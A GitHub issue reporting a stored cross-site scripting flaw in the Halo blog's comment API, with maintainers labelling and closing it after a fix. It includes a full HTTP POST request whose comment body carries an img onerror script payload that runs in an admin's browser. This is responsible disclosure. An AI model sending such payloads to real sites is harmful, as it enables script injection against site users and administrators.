Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Stored xss on Halo blog #547

Closed
rank0 opened this issue Feb 8, 2020 · 2 comments · Fixed by #677
Closed

Stored xss on Halo blog #547

rank0 opened this issue Feb 8, 2020 · 2 comments · Fixed by #677
Assignees
Labels
kind/bug Categorizes issue or PR as related to a bug. vulnerability Vulnerability
Projects
Milestone

Comments

@rank0
Copy link

rank0 commented Feb 8, 2020

Environment

Server Version:1.2.0
Admin Version:1.2.0
DataBase:H2


Vulnerability details

Halo blog allows users to submit comments on blog posts, Application receives data from an untrusted source and not filtered.

step1: submit comment

image
The post packet is as follows:

POST /api/content/posts/comments HTTP/1.1
Host: 192.168.0.104:8090
Content-Length: 132
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.0.104:8090
Referer: http://192.168.0.104:8090/archives/hello-halo
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"author":"guest1","authorUrl":"http://test.com","email":"guest@gmail.com","content":"<img src=1 onerror=alert(/test/)>","postId":1}

step2: view the blog post

After this comment has been submitted, admin who visits the blog post. The script supplied by the attacker will then execute in the victim user's browser.

image
image

code: src/main/java/run/halo/app/controller/content/api/PostController.java
image

Suggestions for repair

  • Proper encoding of untrusted request data
  • Rich text filtering uses a common security API library for each programming language
  • Escaping special characters using the developer's secure escape library
@rank0 rank0 added the kind/bug Categorizes issue or PR as related to a bug. label Feb 8, 2020
@JohnNiang JohnNiang added the vulnerability Vulnerability label Feb 8, 2020
@JohnNiang JohnNiang self-assigned this Feb 8, 2020
@JohnNiang JohnNiang added this to the 1.3.0 milestone Feb 8, 2020
@JohnNiang
Copy link
Member

Related: #127

@JohnNiang
Copy link
Member

Thanks for your exploration and suggestions.

@ruibaby ruibaby added this to To do in plan Feb 11, 2020
ruibaby added a commit to ruibaby/halo that referenced this issue Mar 16, 2020
@ruibaby ruibaby mentioned this issue Mar 16, 2020
@ruibaby ruibaby closed this as completed Mar 16, 2020
ruibaby added a commit that referenced this issue Mar 16, 2020
@ruibaby ruibaby moved this from To do to Done in plan Mar 17, 2020
ruibaby added a commit to ruibaby/halo that referenced this issue Jun 11, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
kind/bug Categorizes issue or PR as related to a bug. vulnerability Vulnerability
Projects
No open projects
plan
  
Done
Development

Successfully merging a pull request may close this issue.

3 participants